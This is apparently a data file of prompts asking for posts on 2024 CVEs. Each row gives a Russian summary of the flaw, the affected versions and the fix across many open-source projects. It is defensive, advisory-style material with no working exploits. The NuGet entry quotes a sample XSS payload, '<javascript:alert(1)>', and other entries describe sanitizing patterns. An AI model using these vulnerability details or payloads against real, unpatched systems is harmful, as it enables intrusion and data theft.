| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in speedtest versions 5.2.5 to 5.3.0,"CVE-CVE-2024-32890 , выявленная вspeedtest в версиях с 5.2.5 до 5.3.0, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена возможностью внедренияjavascriptкода при взаимодействии с JSON API. Висправлениибыло исправлена функция возврата результатов путем добавления заголовкаContent-Typeсо значением""application/json; charset=utf-8""" |
| Write a post on the following topic,SQL-инъекция в плагине WP-Automatic для WordPress,"CVE-CVE-2024-27956 , обнаруженная вплагине WP‑Automatic для WordPress в версиях до 3.9.2, приводит кSQL-injection. Проблема заключалась в возможности любого пользователя корректировать SQL-запрос. Описание проблемы, руководство по обновлению, признаки компрометаций и рекомендации смягчающих действий отражены вблокеWPScan. Встатьеот специалистовPatchStackсодержится информация об уязвимостиCVE-2024-27956и данные об успешных атаках." |
| Write a post on the following topic,Path Traversal уязвимость в фреймворке litestar,"CVE-CVE-2024-32982 , обнаруженная вфреймворке litestar в версиях от 2.0.0 до 2.8.3, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника использовать недостатки обхода пути, обеспечивая несанкционированный доступ к конфиденциальным файлам за пределами назначенных каталогов. Висправлениибыла добавлена нормализация получаемых путей с помощьюos.path.normpath()и последующая проверка с установленным статическим значением директории." |
| Write a post on the following topic,Command Injection в Hoppscotch,"CVE-CVE-2024-34347 , выявленная вhoppscotch в версиях от 0.5.0 до 0.8.0, приводит кCommand Injection. Уязвимость обусловлена возможностью злоумышленника использовать открытые ссылки на объект, чтобы выйти из песочницы и выполнить произвольные системные команды. Висправлениибыла добавлена поддержка библиотекиisolated-vm, которая позволяет создавать более защищенные изолированные среды для выполнения скриптов." |
| Write a post on the following topic,CVE-CVE-2024-32980: уязвимость в формировании URL из заголовка Host в Spin до версии 2.4.3.,"CVE-CVE-2024-32980 , обнаруженная вSpin в версиях до 2.4.3, приводит кExternally Controlled Reference to a Resource in Another Sphere. Проблема заключалась в возможности злоумышленника влиять на формирование URL-адреса запроса через заголовокHostвходящегоhttp-запроса. Висправлениибыло добавлена скорректирована функцияset_req_uri(), в которой исключили формирование URL-адреса на основеHostзаголовка." |
| Write a post on the following topic,SQL Injection уязвимость в GLPI версии 10.0.10,"CVE-CVE-2024-29889 , выявленная вglpi в версии 10.0.10, приводит кSQL Injection. Уязвимость обусловлена возможностью аутентифицированного пользователя воспользоваться уязвимостью SQL-инъекции в функциональной возможности поиска, чтобы изменить данные учетной записи другого пользователя и получить над ними контроль. Висправлениибыла добавлена санитизация значений с помощью функцииSanitizer::sanitize()." |
| Write a post on the following topic,SSRF vulnerability in NextJS versions 13.4 to 14.1.1.,"CVE-CVE-2024-34351 , обнаруженная вNextJS в версии с 13.4 до 14.1.1, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в возможности злоумышленника перенаправлять запросы на стороне сервера на навязанные URL-адреса. Висправлениибыл изменен порядок определения адреса хоста, в приоритете стало использоваться значение из настроек среды окружения. Описание проблемы, руководство по обновлению отражены вsecurity advisory. Встатьеот специалистовAssetnoteсодержится информация об уязвимостиCVE-2024-34351." |
| Write a post on the following topic,"""Server-Side Request Forgery (SSRF) vulnerability in lobe-chat""","CVE-CVE-2024-32964 , обнаруженная вlobe-chat в версиях до 0.150.5, приводит кServer-Side Request Forgery(SSRF). Проблема заключалась в возможности злоумышленника создавать вредоносные запросы, вызывающиеSSRFбез входа в систему. Данная уязвимость позволяла злоумышленнику взаимодействовать с сервисами внутренней сети. Висправлениибыла добавлена проверка получаемого адреса на принадлежность к адресам внутренней сети с помощью методаisPrivate(...)пакетаnode-ip." |
| Write a post on the following topic,Уязвимость Remote Code Execution в Git версии 2.45.0.,"CVE-CVE-2024-32002 , выявленная вgit в версии 2.45.0, приводит кRemote Code Execution(RCE). Уязвимость обусловлена возможностью злоумышленника создавать репозитории с подмодулями таким образом, чтобы использовать ошибку вGit, из-за которой его можно обманом заставить записывать файлы не в рабочее дерево подмодуля, а в.git/каталог. Висправлениибыли изменены функцииclone_submodule()иdir_contains_only_dotgit()путем добавления проверки существования и отсутствия каталога подмодуля, а также наличия в папке назначения только директории или файла.git." |
| Write a post on the following topic,Server-Side Template Injection in llama_cpp_python,"CVE-CVE-2024-34359 , обнаруженная вllama_cpp_python в версиях с 0.2.30 до 0.2.71, приводит кServer-Side Template Injection (SSTI). Проблема заключалась в возможности злоумышленника внедрения в шаблон на стороне сервера через полезную нагрузку поляMetadataпри загрузке файлов с расширением.gguf. Висправлениибыло изменено окружение для обработки шаблонов с использованием методаImmutableSandboxedEnvironment()." |
| Write a post on the following topic,Уязвимость Arbitrary File Reading в Grav до версий 1.7.46,"CVE-CVE-2024-34082 , выявленная вGrav в версиях до 1.7.46, приводит кArbitrary File Reading. Уязвимость обусловлена возможностью злоумышленника с низким уровнем привилегий и правами на редактирование страниц читать любые файлы сервера, используя синтаксисTwig. Висправлениифункцияread_file(), которая используется для чтения файлов, была внесена в ""черный"" список$bad_twig." |
| Write a post on the following topic,SQL-Injection в Zabbix (CVE-2024-22120),"CVE-CVE-2024-22120 , обнаруженная вZabbix c версии 6.0.0 по 6.0.27, приводит кSQL-Injection. Проблема заключалась в возможности злоумышленника влиять на SQL-запрос через параметрclientip, что могло привести к повышению привилегии от пользователя до администратора. Подробная информация обCVE-2024-22120с примерами реализации различных векторов атак, рекомендациями по обновлению содержится в официальномSecurity Advisory." |
| Write a post on the following topic,CVE-2024-34710: Cross-Site Scripting (XSS) vulnerability in Wiki.js,"CVE-CVE-2024-34710 , обнаруженная вwiki.js в версиях до 2.5.302, приводит кCross-Site Scripting(XSS). Проблема заключалась в возможности злоумышленника внедрить вредоносный JavaScript код, который будет выполняться на стороне клиента. Висправлениивыражения в фигурных скобках ({}) оборачивается тегом<p>и c атрибутомv-pre, который дляVueустанавливает запрет компиляции выражения." |
| Write a post on the following topic,Уязвимость типа Open redirect в Umbraco CMS.,"CVE-CVE-2024-34071 , выявленная вUmbraco-CMS в версиях от 8.18.5 до 8.18.14, приводит кOpen redirect. Уязвимость обусловлена возможностью злоумышленника, прошедшего проверку подлинности, использовать уязвимый эндпоинт для открытого перенаправления. Висправлениибыла добавлена функцияIsWellFormedWebPath(), которая определяет, правильно ли сформирован предоставленный путь в соответствии с указанным в аргументахUriKind.Relative." |
| Write a post on the following topic,Prototype Pollution vulnerability in apidevtools/json-schema-ref-parser,"CVE-CVE-2024-29651 , обнаруженная вapidevtools/json-schema-ref-parser в версиях 11.0.0 и 11.1.0, приводит кPrototype Pollution. Проблема заключалась в возможности злоумышленника манипулировать прототипом объекта и влиять на поведение объектов, которые были унаследованы от этого прототипа. Висправлениибыла добавлена фильтрация данных, которые проходят слияние, путем применения ""черного"" списка c недопустимыми значениями""__proto__"", ""constructor"", ""prototype""." |
| Write a post on the following topic,Уязвимость в fastify/session приводит к сбою в идентификации и аутентификации,"CVE-CVE-2024-35220 , выявленная вfastify/session в версиях до 10.8.0, приводит кIdentification and Authentication Failures. Уязвимость обусловлена возможностью злоумышленника использовать устаревшие файлы cookie для доступа к сеансам с истекшим сроком действия. Висправленииввели дополнительное полеoriginalExpiresи его проверку на превышение относительно текущей даты, по результатам которого производится сброс сессии." |
| Write a post on the following topic,Обнаружение уязвимости Remote Code Execution в Confluence Data Center and Server.,"CVE-CVE-2024-21683 , обнаруженная вConfluence Data Center and Server в версии 8.9.0, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности аутентифицируемого злоумышленника выполнить произвольный код. Подробная информация оCVE-2024-21683, затронутых версиях, рекомендациях по обновлениям содержится в официальномSecurity Advisory." |
| Write a post on the following topic,Path Traversal vulnerability in openapi-generator,"CVE-CVE-2024-35219 , обнаруженная вopenapi-generator в версиях до 7.5.0, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника через настройкуoutputFolderчитать и удалять файлы, которые находятся на сервере. Висправленииразработчики исключили использование опцииoutputFolderдля построения пути к каталогу." |
| Write a post on the following topic,Уязвимость Code Injection в шаблонизаторе Smarty,"CVE-CVE-2024-35226 , выявленная вшаблонизаторе Smarty в версиях 4.5.3, приводит кCode Injection. Уязвимость обусловлена возможностью злоумышленника внедрить в шаблон исполняемый PHP код через тегextends. Висправлениидля тегаextendбыло удалено использование функцииcompileInclude(), обеспечивающую вставку и исполнение PHP кода." |
| Write a post on the following topic,CVE-2024-36109: XSS уязвимость в Cocalc через Markdown и теги <script>,"CVE-CVE-2024-36109 , выявленная вCocalc в версиях до коммита 419862a9c9879c, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника внедритьJavaScriptкод с помощью тегов<script>при рендеринге формата Markdown. Висправлениитег<script>был исключен из ""белового"" списка и была удалена его обработка при рендеринге скриптов библиотеки mathjax." |
| Write a post on the following topic,Уязвимость SQL-injection в библиотеке PyMySql,"CVE-CVE-2024-36039 , выявленная вбиблиотеке PyMySql в версиях до 1.1.1, приводит кSQL-injection. Уязвимость обусловлена возможностью злоумышленника выполнить произвольные SQL запросы при обращении к базе, внедряя полезную нагрузку в наименования ключей словаря. Висправлениибыла убрана поддержка обработки данных типаDict." |
| Write a post on the following topic,Уязвимость Remote Code Execution в Apache HugeGraph-Server,"CVE-CVE-2024-27348 , обнаруженная вApache HugeGraph-Server в версиях с 1.0.0 до 1.3.0, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности злоумышленника удаленно выполнять код на сервере, используя недостаток обработки пользовательского ввода в интерфейсеGremlin. Информация об уязвимости, уязвимых версиях, рекомендациях по обновлению и возможных превентивных мерах находится вSecurity Advisory." |
| Write a post on the following topic,IDOR vulnerability in Kanboard versions up to 1.2.36,"CVE-CVE-2024-36399 , обнаруженная вKanboard в версиях до 1.2.36, приводит кInsecure Direct Object References (IDOR). Проблема заключалась в возможности использоватьidпроекта из входящего запроса. Висправлениибыла добавлена проверкаCSRF-токенови убрана возможность напрямую использовать параметрproject_idиз запроса при добавлении пользователя или группы." |
| Write a post on the following topic,Уязвимость OS Command Injection в PHP версий 8.1.* до 8.1.29.,"CVE-CVE-2024-5585 , выявленная вPHP в версиях от 8.1.* до 8.1.29, приводит кOS Command Injection. Уязвимость обусловлена возможностью злоумышленника в случае контроля аргументов функцииproc_open()внедрить произвольные команды ОС Windows. Такое поведение возникает при использовании в конце имени скрипта пробела для аргумента функцииproc_open(), что позволяет обойти встроенный механизм экранирования. Висправлениибыли доработаны методы преобразования путей с помощью внедрения функцийGetLongPathNameW()иGetFullPathNameW()." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in Ruby on Rails versions 7.1.0 to 7.1.3.4,"CVE-CVE-2024-32464 , обнаруженная вRuby on rails в версиях с 7.1.0 до7.1.3.4, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника внедрить полезную нагрузку в экземплярыActionText::Attachable::ContentAttachment, включенные в тегиrich_text_area. Висправлениибыла добавлена санитизация экземпляров с помощью функцииsanitize_content_attachment(), которая позволяет фильтровать теги и атрибуты с помощьюsanitizer_allowed_tagsиsanitizer_allowed_attributes." |
| Write a post on the following topic,Уязвимость Code Injection в шаблонизаторе pug,"CVE-CVE-2024-36361 , выявленная вшаблонизаторе pug в версиях c 3.0.2, приводит кCode Injection. Уязвимость обусловлена возможностью злоумышленника внедрить исполняемый код в название шаблона, который нужно использовать. Висправлениибыла внедрена проверка передаваемого значенияtemplateNameчерез контроль по регулярному выражению^[0-9a-zA-Z\-\_]+?$." |
| Write a post on the following topic,Уязвимость PHP приводит к Remote Code Execution (CVE-2024-4577),"CVE-CVE-2024-4577 , обнаруженная вPHP в версиях с 8.1 до 8.1.29, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности вызова исполняемого модуляphp.exec аргументами из HTTP запроса в CGI-режиме. Уязвимость обусловлена реализацией в Windows возможности ""Best-Fit mapping"" при кодировании символов, что позволяет обойти экранирование. Информация об уязвимости, уязвимых версиях, рекомендациях по обновлению находится вSecurity Advisory. Встатьеот специалистов команды DevCore подробно расписана информация оCVE-2024-4577." |
| Write a post on the following topic,Vulnerability in NuGet Gallery leading to Cross-Site Scripting (XSS),"CVE-CVE-2024-37304 , обнаруженная вNuGet Gallery в версиях до v2024.05.28, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника внедрить скрипт через автоссылки в формате Markdown (например,<javascript:alert(1)>). Висправлениив функциюGetHtmlFromMarkdownMarkdig()была добавлена санитизация, получаемого html-кода, с использованием регулярного выражения""<a href=([\""\'])javascript:.*?\\1 rel=([\""'])noopener noreferrer nofollow\\1>""." |
| Write a post on the following topic,Vulnerability in MLflow leading to Arbitrary File Writing,"CVE-CVE-2024-0520 , обнаруженная вMLflow в версиях до 2.9.0, приводит кArbitrary File Writing. Проблема заключалась в возможности злоумышленника внедрить полезную нагрузку в набор данных, который импортируется, и сохранить его в произвольное место в файловой системе. Висправлениив функцииload()был добавлен контроль значения из заголовкаhttp-запроса""Content-Disposition""на соответствие имени файла, с использованием функцииos.path.basename()." |
| Write a post on the following topic,XSS vulnerability in jupyter_server_proxy versions 3.0.0 to 3.2.4 and 4.2.0,"CVE-CVE-2024-35225 , выявленная вjupyter_server_proxy в версиях с 3.0.0 до 3.2.4 и 4.2.0, приводит кCross-Site Scripting (XSS). Уязвимость позволяет злоумышленнику использовать значениеhostиз состава path/proxy/<host>для инъекции скрипта в состав формируемогоhtml-кодав ответе. Висправлениипри обработки некорректных значенийhostответ, содержащий значениеhost, формируется с использованием функцииweb.HTTPError(), которая отображает сообщение об ошибке только в режиме отладки." |
| Write a post on the following topic,CVE-2024-37301: Server-Side Template Injection в Document Merge Service,"CVE-CVE-2024-37301 , обнаруженная в сервисеDocument Merge Service до версии 6.5.2, приводит кServer-Side Template Injection (SSTI). Проблема заключалась в возможности злоумышленника внедрения в шаблон на стороне сервера исполняемого кода, который выполниться при рендере шаблона. Висправлениибыло изменено окружение для обработки шаблонов (функцияSandboxedEnvironment()), которое перехватывает и запрещает опасное поведение в процессе рендера шаблона." |
| Write a post on the following topic,Command injection vulnerability in Composer versions 2.0 to 2.2.24,"CVE-CVE-2024-35241 , обнаруженная вComposer в версиях с 2.0 до 2.2.24, приводит кCommand injection. Проблема заключалась в возможности злоумышленника внедрить исполняемые системные команды в название веток репозитория, которые исполнятся на удаленной стороне при работе с пакетами, установленными из этого репозитория через git, с помощью командstatus,reinstallиremove. Висправлениибыл изменен процесс формирования команды, которая поступает в функциюexecute(), с помощью функцииProcessExecutor::escape()." |
| Write a post on the following topic,SQL Injection в Gin-vue-admin,"CVE-CVE-2024-37896 , обнаруженная вGin-vue-admin в версиях до 2.6.6, приводит кSQL Injection. Проблема заключалась в возможности злоумышленника внедрить произвольный SQL код в параметр http-запросаorderпри обращении к эндпоинту/api/sysExportTemplate/exportExcel. Висправлениибыли добавлены проверки на корректность значения параметраorder, перед его использованием в SQL-запросе." |
| Write a post on the following topic,XSS уязвимость в TinyMCE до версии 5.11.0,"CVE-CVE-2024-38356 , обнаруженная вTinyMCE в версиях до 5.11.0, приводит кCross-Site Scripting(XSS). Проблема заключалась в возможности злоумышленника внедрить вредоносный код в специально созданные HTML-атрибуты, которые могут быть выполнены при извлечении содержимого из редактора. Висправлениибыла добавлена функцияisValidContent(), которая используется для проверки переменнойcontent, содержащей пользовательские данные, с помощью массива регулярных выраженийnonEditableRegExps." |
| Write a post on the following topic,Path Traversal vulnerability in Reposilite versions up to 3.3.0,"CVE-CVE-2024-36116 , обнаруженная вReposilite в версиях до 3.3.0, приводит кPath Traversal. Проблема заключалась в возможности внедрить полезную нагрузку в название файла внутри загружаемого архиваJavadoc, которое в последующем без нормализации поступает в функциюPaths.get(), что позволяет создать произвольный файл. Висправлениибыл изменен алгоритм обработки загружаемых архивов, путем преобразования имен файлов внутри архива в пути, которые в дальнейшем проходят проверку принадлежности относительно родительской директорииjavadocUnpackPath." |
| Write a post on the following topic,Уязвимость Path Traversal в DeepJavaLibrary (DJL),"CVE-CVE-2024-37902 , выявленная вDeepJavaLibrary(DJL) в версиях с 0.1.0 по 0.27.0, приводит кPath Traversal. Уязвимость обусловлена возможностью злоумышленника создать архив, в составе которого будут находится файлы с названиями, содержащими пути файловой системы, загрузить его и перезаписать произвольные файлы. Висправлениибыл добавлен методremoveLeadingFileSeparator, который с помощьюFile.separatorCharубирает символы разделители из названий файлов, находящихся в загружаемых архивах." |
| Write a post on the following topic,Authentication Bypass Vulnerability in Telerik Report Server,"CVE-CVE-2024-4358 , обнаруженная вProgress Telerik Report Server в версиях до 2024 Q1 (10.0.24.305), приводит кAuthentication Bypass. Проблема заключалась в возможности злоумышленника, не прошедшего проверку подлинности, получить доступ к ограниченным функциям сервера отчетов Telerik. Информация об уязвимости, уязвимых версиях, рекомендациях по обновлению и возможных превентивных мерах находится вSecurity Advisory" |
| Write a post on the following topic,Server Side Request Forgery (SSRF) vulnerability in ChatGPT-Next-Web versions up to 2.12.4,"CVE-CVE-2024-38514 , обнаруженная вChatGPT-Next-Web в версиях до 2.12.4, приводит кServer Side Request Forgery (SSRF). Проблема заключалась в возможности злоумышленника внедрить полезную нагрузку при обращении к/api/webdav/chatgpt-next-web/backup.jsonв параметр http-запросаendpointи выполнить запрос к сторонним ресурсам, которые не находятся в ""белом"" списке, из-за некорректного процесса валидации получаемых данных. Висправлениибыла добавлена функцияnormalizeUrl, которая в качестве входных данных принимает значения параметра, помещает их в конструкторURL()и возвращает в нормализованном виде, и изменена логика процесса валидации." |
| Write a post on the following topic,Cross-site Scripting (XSS) vulnerability in django-rest-framework,"CVE-CVE-2024-21520 , выявленная вdjango-rest-framework в версиях до 3.15.2, приводит кCross-site Scripting (XSS). Уязвимость обусловлена возможностью злоумышленника внедрить в значение заголовка http-запроса полезную нагрузку, которая в дальнейшем без санитизации попадет в html тэги<br>в шаблон при условии, что её значение больше 160 символов и в ней есть символ"","". Висправлениив функциюbreak_long_headersбыл добавлен методescape(), который предназначен для санитизации получаемых значений." |
| Write a post on the following topic,SQL Injection в Parse Server до версии 6.5.7,"CVE-CVE-2024-39309 , обнаруженная вParse Server в версиях до 6.5.7, приводит кSQL Injection. Проблема заключалась в возможности обхода регулярных выражений, использующихся для фильтрации входных данных, и выполнения произвольного SQL кода при работе с PostgreSQL. Висправлениибыли добавлены паттерн/'+/g, который используется для поиска всех вхождений символа одинарной кавычки в строке, и функция экранирования, которая применяется в случае, если вхождения, обнаруженные с помощью добавленного регулярного выражения, имеют нечетное количество символов." |
| Write a post on the following topic,Уязвимость XXE в cycledx-core-java,"CVE-CVE-2024-38374 , выявленная вcycledx-core-java в версиях с 2.1.0 по 9.0.4, приводит кXML external entity (XXE). Уязвимость обусловлена возможностью злоумышленника внедрять внешние сущности в спецификацию CycloneDX в формате XML из-за использования небезопасного анализатораxPathExpressionпри обработке. Висправлениианализатор был заменен наDocumentBuilderFactory, который в последующем был настроен путём добавления параметровACCESS_EXTERNAL_DTDиACCESS_EXTERNAL_SCHEMAсо значениями""""." |
| Write a post on the following topic,CVE-2024-5655: Уязвимость Broken Access Control в GitLab CE/EE,"CVE-CVE-2024-5655 , обнаруженная вGitLab CE/EE в версиях с 15.8 до 16.11.5, приводит кBroken Access Control. Проблема заключалась в возможности злоумышленника запускать пайплайны от имени других пользователей. Информация об уязвимости, уязвимых версиях, рекомендациях по обновлению и внесенных изменениях находится вPatch Release." |
| Write a post on the following topic,CVE-2024-38519: Path Traversal in yt-dlp,"CVE-CVE-2024-38519 , обнаруженная вyt-dlp в версиях до 2024.07.01, приводит к Path Traversal. Проблема заключалась в возможности злоумышленника внедрить полезную нагрузку в имя загружаемого файла и перезаписать произвольные файлы в файловой системе из-за отсутствия проверки расширений. Висправлениибыла добавлена санитизация расширений получаемых файлов с помощью методаsanitize_extension(), а также их проверка с значениями из ""белого"" спискаALLOWED_EXTENSIONS." |
| Write a post on the following topic,OS Command Injection vulnerability in Rejetto HFS,"CVE-CVE-2024-39943 , выявленная вRejetto HFS в версиях до 0.52.10, приводит кOS Command Injection. Уязвимость обусловлена возможностью аутентифицированного злоумышленника, который имеет права на загрузку файлов, внедрить и выполнить команды ОС из-за использования опасной функцииexecSync()при обработке получаемых данных. Висправлениибыл изменен методgetDiskSpaceSyncпутем замены функцииexecSync()на безопасную функциюspawnSync()." |
| Write a post on the following topic,Server-side request forgery (SSRF) vulnerability in fedify,"CVE-CVE-2024-39687 , выявленная вfedify в версиях до 0.11.2, приводит кServer-side request forgery (SSRF). Уязвимость обусловлена возможностью злоумышленника обращаться к хостам в внутренней сети при попытке загрузки файлов JSON-LD из-за отсутствия валидации получаемых сетевых адресов. Висправлениив методыfetchDocumentLoader()иgetAuthenticatedDocumentLoader()была добавлена валидация получаемого значения с помощью функцииvalidatePublicUrl(), которая включает в себя проверку на принадлежность к адресам внутренней сети." |
| Write a post on the following topic,Уязвимость Session Fixation в fiber до версии 2.52.4,"CVE-CVE-2024-38513 , выявленная вfiber в версиях до 2.52.4, приводит кSession Fixation. Уязвимость обусловлена возможностью злоумышленника создавать новые сеансы, указывая произвольные значенияsession_id. Висправлениибыла предотвращена возможность использования произвольных значений идентификаторов, путем добавления проверки на валидность получаемых значений и генерации новых идентификаторов в случае, если проверки не были пройдены." |
| Write a post on the following topic,Path Traversal уязвимость в Splunk Enterprise,"CVE-CVE-2024-36991 , обнаруженная вSplunk Enterprise в верисях до 9.2.2, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника, не прошедшего аутентификацию, получить доступ к произвольным файлам на хосте при обращении к эндпоинту/modules/messaging/. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal уязвимость в solara до версии 1.35.1,"CVE-CVE-2024-39903 , выявленная вsolara в версиях до 1.35.1, приводит кPath Traversal. Уязвимость обусловлена возможностью злоумышленника получить доступ к файлам, манипулируя URI в процессе работы со статическими файлами. Висправлениибыла добавлена функцияpath_is_child_of(), которая нормализует URI и контролирует принадлежность пути к ""родительскому"" каталогу." |
| Write a post on the following topic,CVE-2024-39914: OS Command Injection в fogproject,"CVE-CVE-2024-39914 , обнаруженная вfogproject в версиях до1.5.10.34, приводит кOS Command Injection. Проблема заключалась в возможности злоумышленника внедрить команды ОС при экспорте отчета через параметр http-запросаfilename, которое в дальнейшем попадает в функцию выполнения команды ОСpassthru(). Висправлениибыла добавлена функцияescapeshellarg()для санитизации значения параметраfilename." |
| Write a post on the following topic,Cross-site Scripting (XSS) vulnerability in CodiMD version 2.5.3,"CVE-CVE-2024-38354 , обнаруженная вcodimd в версии 2.5.3, приводит кCross-site Scripting (XSS). Проблема заключалась в возможности злоумышленника внедрить полезную нагрузку в распространяемые заметки и выполнить произвольный JavaScript код в пользовательском пространстве. Висправлениибыл исключен атрибутnameиз ""белого"" списка атрибутов для тэговiframewhiteList.iframe." |
| Write a post on the following topic,OS Command Injection vulnerability in setuptools,"CVE-CVE-2024-6345 , выявленная вsetuptools в версиях до 70.0.0, приводит кOS Command Injection. Уязвимость обусловлена возможностью злоумышленника внедрить произвольные команды ОС в ссылки для скачивания зависимостей, которые в дальнейшем попадают в функциюos.system(). Висправлениибыла заменена функцияos.system()наsubprocess.check_call()с передачей аргументов в виде списка." |
| Write a post on the following topic,Arbitrary File Upload vulnerability in Modern Events Calendar plugin for WordPress.,"CVE-CVE-2024-5441 , обнаруженная вплагине Modern Events Calendar для WordPress в версиях до 7.11.0включительно, приводит кArbitrary File Upload. Проблема заключалась в возможности аутентифицированного злоумышленника с правами подписчика загружать произвольные файлы на хост из-за отсутствия валидации типов загружаемых файлов в функцииset_featured_image(). Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-40631: XSS vulnerability in @udecode/plate-media.,"CVE-CVE-2024-40631 , обнаруженная в@udecode/plate-media в версиях до 36.0.10, приводит кCross-Site scripting (XSS). Проблема заключалась в возможности внедренияJavascriptпод видом ссылок на медиафайлы в пользовательские редакторы, использующиеMediaEmbedElement, в методеuseMediaState(). Висправлениибыл добавлен методparseMediaUrl(), в котором производится дополнительная санитизация получаемых значений." |
| Write a post on the following topic,"Выявленная уязвимость в JumpServer, приводящая к произвольной записи файлов.","CVE-CVE-2024-40629 , выявленная вJumpServer в версиях с 3.0.0 до 3.10.11, приводит кArbitrary File Writing. Уязвимость обусловлена возможностью злоумышленника с минимальными правами перезаписать произвольные файлы в контейнереcelery, который запускается от имени пользователя root и имеет доступ к базе данных JumpServer, с помощью плейбуковansible. Висправлениибыла добавлена настройка для запуска ранеровansibleв изолированной песочнице с помощьюbubblewrap." |
| Write a post on the following topic,CVE-2024-39877: Remote Code Execution vulnerability in Apache Airflow due to Jinja templating.,"CVE-CVE-2024-39877 , обнаруженная вApache Airflow в версиях с 2.4.0 до 2.9.3, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности злоумышленника внедрить в файлы исполняемый код, который будет выполнен из-за использования шаблонизатораJinja. Висправлениифункциональная возможность использования Jinja была убрана." |
| Write a post on the following topic,Path Traversal уязвимость в Django версий 5.0 до 5.0.7,"CVE-CVE-2024-39330 , выявленная вDjango в версиях с 5.0 до 5.0.7, приводит кPath Traversal. Уязвимость обусловлена возможностью злоумышленника получить доступ к локальным файлам на хосте, если веб-приложение использует кастомную систему хранения, являющейся производной классаdjango.core.files.storage.Storage. Висправлениив методеvalidate_file_name()был изменен процесс санитизации путем добавления обработки получаемого значения с помощью функцииreplace()." |
| Write a post on the following topic,SSRF vulnerability in Apache HTTP Server for Windows,"CVE-CVE-2024-40898 , обнаруженная вApache HTTP Server для Windows в версиях c 2.4.0 до 2.4.61 включительно, приводит кServer-Side request forgery (SSRF). Проблема заключалась в возможности злоумышленника вызвать утечку NTLM хэшей пользователей путем отправки вредоносных запросов, используя недостаток в работе модуляmod_rewrite. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-41662: Cross-Site Scripting (XSS) in VNote,"CVE-CVE-2024-41662 , обнаруженная вVNote в версиях до 3.18.1включительно, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника внедрить произвольныйJavaScriptкод. Висправлениибыл добавлен ""белый"" список разрешенных тегов и атрибутов с помощью библиотекиfilterXSS, также была добавлена санитизация пользовательского ввода перед рендерингом с помощью кастомной функцииfilterContent." |
| Write a post on the following topic,Server-Side Template Injection in OpenAM,"CVE-CVE-2024-41667 , выявленная вOpenAM в версиях до 15.0.3 включительно, приводит кServer-Side Template Injection (SSTI). Уязвимость обусловлена возможностью злоумышленника внедрить произвольный код в пользовательские шаблоны в результате неправильной настройки шаблонизатораfreemarker.core.TemplateClassResolver. Висправлениибыл добавлен флагSAFER_RESOLVERпри инициализации шаблонизатораfreemarker.core.TemplateClassResolver, что исключает возможность использования функцииExecute()в шаблонах." |
| Write a post on the following topic,OS Command Injection в reNgine из-за использования subprocess.check_output() с флагом shell=True,"CVE-CVE-2024-41661 , обнаруженная вreNgine в версиях с 1.2.0, приводит кOS Command Injection. Проблема заключалась в использовании функцииsubprocess.check_output()с флагомshell=True(см.source code) для проверки URL адреса, в которую могут поступить данные от злоумышленника. Висправлениибыла добавлена валидация значений параметраurlc помощьюvalidatorsи опасная функцияsubprocess.check_output()была заменена наrun_command()с флагомremove_ansi_sequence=True." |
| Write a post on the following topic,Уязвимость XSS в Sentry версий с 10.0.0 до 24.7.1,"CVE-CVE-2024-41656 , выявленная вSentry в версиях с 10.0.0 до 24.7.1, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена возможностью злоумышленника внедрить произвольные HTML-теги, которые в дальнейшем могут быть отображены на странице «Проблемы». Висправлениивставка HTML-тегов непосредственно в строки аннотаций была заменена на представление, получаемых значений, как объектов с полямиurlиdisplayName." |
| Write a post on the following topic,Remote Code Execution vulnerability in Telerik Report Server,"CVE-CVE-2024-6327 , обнаруженная вTelerik Report Server в версиях до 10.1.24.709, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности злоумышленника не прошедшего аутентификацию удаленно выполнить код из-за небезопасной десериализации. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-41956 приводит к Remote Code Execution в soft-serve.,"CVE-CVE-2024-41956 ,обнаруженная вsoft-serve в версиях до 0.7.5, приводит кRemote Code Execution (RCE). Проблема заключалась в передаче всех переменных среды, заданных в пользовательской сессии, в подпроцессы git (см.source code),что позволяет в дальнейшем манипулировать ими и запускать произвольный код. Висправлениипроцесс передачи переменных сессии был изменен таким образом, что из пользовательской сессии берется только переменнаяGIT_PROTOCOLдля определения версии используемого протокола." |
| Write a post on the following topic,Уязвимость Arbitrary File Upload в fogproject,"CVE-CVE-2024-40645 ,выявленная вfogproject в версии 1.5.10, приводит кArbitrary File Upload. Уязвимость обусловлена в возможности загрузки произвольных файлов без проверки расширений в функции загрузки баннеров постов (см.source code). Висправлениибыл добавлен""белый""список расширений$validExtensionsдля валидации загружаемых файлов." |
| Write a post on the following topic,"SQL-инъекция в Meshery, CVE-2024-29031","CVE-CVE-2024-29031 ,обнаруженная вMeshery в версиях до 0.7.17, приводит кSQL-Injection. Проблема заключалась в попадании значения из параметра http-запросаorder(см.source code) без санитизации в SQL-запрос, что позволяет злоумышленнику внедрить произвольный SQL код. Висправлениибыла добавлена санитизация получаемого значения с помощью функцииSanitizeOrderInput." |
